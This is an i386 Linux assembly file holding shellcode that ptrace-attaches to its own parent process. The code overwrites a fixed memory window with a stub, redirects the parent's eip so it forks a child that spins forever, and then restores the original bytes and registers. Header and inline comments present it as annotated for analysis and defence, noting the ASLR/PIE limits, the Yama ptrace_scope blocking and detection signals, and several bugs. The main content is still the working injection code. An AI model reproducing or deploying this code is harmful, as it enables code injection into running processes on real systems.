/*---------------------------------------------------------------------
 * cbegin .. cend
 *
 * Position-independent i386 Linux code (raw int $0x80 syscalls, AT&T
 * syntax).  It forks twice and, from the grandchild, ptrace-attaches to
 * the ORIGINAL PARENT (getppid) of the process running it.  It then copies
 * a window of the target's memory at a fixed address (0x08048210, the
 * classic non-PIE i386 text range) aside into a fixed stack address
 * (0xbffff010), overwrites that window with the short stub at pointX,
 * redirects the target's eip there, resumes it, and once the stub traps
 * writes the saved bytes and registers back and detaches.
 *
 * Syscall convention: nr in %eax, args in %ebx/%ecx/%edx/%esi/%edi.
 * Immediates are loaded with `pushl $imm8 / popl %reg`, a recognisable
 * shellcode idiom (reads as an effort to avoid zero bytes in the
 * encoding).
 *
 * Register roles across the block:
 *   %ebp = pid of the parent (the ptrace target), fixed after getppid.
 *   %edx = target address, %esi = local address / data word,
 *   %edi = iteration counter, inside the peek/poke loops.
 *
 * Review notes (analysis / defence):
 *   - Both addresses are hard-coded, so this only lines up on a non-PIE
 *     target running without ASLR; with either enabled the peeks and pokes
 *     land on unrelated memory.
 *   - PTRACE_ATTACH to a non-descendant (here: the parent) is exactly what
 *     the Yama ptrace_scope restriction (>= 1) blocks, and a ptrace(ATTACH)
 *     from a child towards its own parent is a strong detection signal
 *     (audit/seccomp on the ptrace syscall).
 *   - The copy loops advance %edx/%esi by ONE byte per iteration although
 *     each request transfers a 4-byte word, so consecutive transfers
 *     overlap; the net span is counter+3 bytes.
 *-------------------------------------------------------------------*/
.globl cbegin
.globl cend

cbegin:
        /* getppid */
        pushl   $64                     /* SYS_getppid */
        popl    %eax
        int     $0x80
        /* movl %eax, %ecx */
        pushl   %eax                    /* ppid kept on the stack; popped again at fchild */
        xchgl   %ebp, %eax              /* %ebp = ppid, live for the rest of the block */

        /* z_fork */
        pushl   $2                      /* SYS_fork */
        popl    %eax
        int     $0x80
        or      %eax, %eax
        je      fchild                  /* child: go and attach */

        /* waitpid (pid, NULL, 0) */
        pushl   $7                      /* SYS_waitpid */
        popl    %esi
        xchgl   %esi, %eax              /* eax = 7, esi = child pid from fork (ppid is in %ebp, not %esi) */
        xorl    %ecx, %ecx              /* status = NULL */
        xorl    %edx, %edx              /* options = 0 */
        int     $0x80                   /* NOTE(review): %ebx (pid arg) is never loaded in this block; it is whatever %ebx held on entry */

        /* nanosleep({10, 10}, same buffer), then spin forever */
        xorl    %eax, %eax
        movb    $162, %al               /* SYS_nanosleep */
        pushl   $10                     /* tv_nsec */
        pushl   $10                     /* tv_sec */
        movl    %esp, %ebx              /* req = &timespec on the stack */
        movl    %esp, %ecx              /* rem = the same buffer */
        int     $0x80
ui:     jmp     ui                      /* the first process never exits on its own */

        /* exit */
fexit:
        pushl   $1                      /* SYS_exit */
        popl    %eax
        xorl    %ebx, %ebx              /* status = 0 */
        int     $0x80

        /*** CHILD ***/
fchild:
        pushl   $2                      /* second fork */
        popl    %eax
        int     $0x80
        or      %eax, %eax
        jne     fexit                   /* intermediate child exits; the grandchild carries on */
        popl    %ecx                    /* parent process pid (pushed right after getppid) */

        /* ptrace attach: ptrace(PTRACE_ATTACH = 16, ppid, 0, 0) */
        pushl   $26                     /* SYS_ptrace */
        popl    %eax
        cdq                             /* %edx (addr) = 0, since %eax is positive */
        pushl   $16
        popl    %ebx
        xorl    %esi, %esi              /* data = 0 */
        int     $0x80

        /* ptrace peekdata: save the target window at 0x08048210 to local 0xbffff010, 127 iterations */
        movl    $0x08048210, %edx       /* target address */
        /* movl $0xbf7ff010, %edx */
        movl    $0xbffff010, %esi       /* local save area (hard-coded stack address) */
        pushl   $127
        popl    %edi                    /* iteration counter */
loopa:
        movl    %ebp, %ecx              /* pid = target */
        pushl   $26
        popl    %eax
        pushl   $2                      /* PTRACE_PEEKDATA */
        popl    %ebx
        pushl   %edi                    /* counter parked on the stack across the syscall */
        int     $0x80                   /* word at target %edx is written to local *%esi */
        popl    %edi
        incl    %edx                    /* one-byte step, not four: successive reads overlap */
        incl    %esi
        decl    %edi
        jnz     loopa

        /* ptrace getregs: ptrace(PTRACE_GETREGS = 12, ppid, 0, &regs), regs on our own stack */
        movl    %ebp, %ecx
        pushl   $26
        popl    %eax
        pushl   $12
        popl    %ebx
        pusha                           /* reserves 32 bytes; the i386 user_regs_struct (68 bytes) runs 36 bytes past it into older stack content, presumably unused here */
        movl    %esp, %esi              /* data = &regs */
        int     $0x80

        /* ptrace setregs: point the target's eip at the patched window */
        movl    %ebp, %ecx
        pushl   $26
        popl    %eax
        pushl   $13                     /* PTRACE_SETREGS */
        popl    %ebx
        movl    %esp, %esi              /* data = &regs (same buffer as getregs) */
        movl    48(%esi), %edi          /* offset 48 = eip in the i386 user_regs_struct */
        pushl   %edi                    /* original eip kept for the restore further down */
        movl    $0x08048210, 48(%esi)
        /* movl $0xbf7ff010, 48(%esi)*/
        int     $0x80
        jmp     pointX                  /* call/pop trick to get the stub's own address into %esi */

pointY:
        popl    %esi                    /* %esi = return address pushed by `call pointY` = start of the stub */
        movl    $0x08048210, %edx       /* target address */
        pushl   $20
        popl    %edi                    /* 20 pokes, one-byte step */
loopc:
        movl    %ebp, %ecx
        pushl   $26
        popl    %eax
        pushl   $5                      /* PTRACE_POKEDATA */
        popl    %ebx
        pushl   %edi
        pushl   %esi
        movl    (%esi), %esi            /* data = next word of the stub */
        int     $0x80
        popl    %esi
        popl    %edi
        incl    %edx
        incl    %esi
        decl    %edi
        jnz     loopc

        /* ptrace pokedata */
        /* movl %ebp, %ecx pushl $26 popl %eax pushl $5 popl %ebx movl $0xccccfeeb, %esi*/
        /* movl $0xbf7ff010, %edx*/
        movl    $0x08048210, %edx       /* left over from the commented-out single poke above; %edx is reloaded again before loopb */
        /* int $0x80*/

        /*ptrace cont */
        movl    %ebp, %ecx
        pushl   $26
        popl    %eax
        cdq                             /* addr = 0 */
        pushl   $7                      /* PTRACE_CONT */
        popl    %ebx
        xorl    %esi, %esi              /* data (signal to deliver) = 0 */
        int     $0x80

        /* wait 4 */
        /* 0 on return */
        cdq                             /* relies on %eax == 0 from PTRACE_CONT: %edx (options) = 0 */
        movl    %eax, %ebx
        decl    %ebx                    /* pid = -1 (any child / tracee) */
        movl    %eax, %ecx              /* status = NULL */
        movb    $114, %al               /* SYS_wait4; %esi (rusage) is still 0 from above */
        int     $0x80                   /* returns once the target stops (the stub's int3 below) */

        /* ptrace pokedata: write the 127 saved bytes back into the target */
        movl    $0x08048210, %edx
        movl    $0xbffff010, %esi
        /* movl $0xbf7ff010, %edx*/
        pushl   $127
        popl    %edi
loopb:
        movl    %ebp, %ecx
        pushl   $26
        popl    %eax
        pushl   $5                      /* PTRACE_POKEDATA */
        popl    %ebx
        pushl   %edi
        pushl   %esi
        movl    (%esi), %esi            /* data = saved word */
        int     $0x80
        popl    %esi
        popl    %edi
        incl    %edx
        incl    %esi
        decl    %edi
        jnz     loopb

        /* ptrace setregs: restore the original eip */
        popl    %edi                    /* original eip pushed before the first setregs; the loops are push/pop balanced */
        movl    %ebp, %ecx
        pushl   $26
        popl    %eax
        pushl   $13                     /* PTRACE_SETREGS */
        popl    %ebx
        movl    %esp, %esi              /* top of stack is the regs buffer filled by getregs again */
        movl    %edi, 48(%esi)
        int     $0x80

        /* ptrace detach */
        movl    %ebp, %ecx
        pushl   $17                     /* PTRACE_DETACH */
        popl    %ebx
        pushl   $26
        popl    %eax
        cdq                             /* addr = 0 */
        movl    %edx, %esi              /* data = 0 */
        int     $0x80

        /* exit */
        xorl    %ecx, %ecx
        incl    %esi                    /* %esi = 1 */
        xchgl   %esi, %eax              /* eax = 1 = SYS_exit; %ebx still holds 17 from the detach request */
        int     $0x80

pointX:
        call    pointY                  /* pushes the address of the stub below; popped at pointY */
        /* stub: executed inside the target once its eip has been redirected to the patched window */
        pushl   $2                      /* second fork */
        popl    %eax
        int     $0x80
        or      %eax, %eax
        je      pointA                  /* the target's new child spins forever at pointA */
        int     $0x3                    /* the target itself traps; under ptrace that is the stop the tracer's wait4 waits for */
pointA:
        jmp     pointA
cend: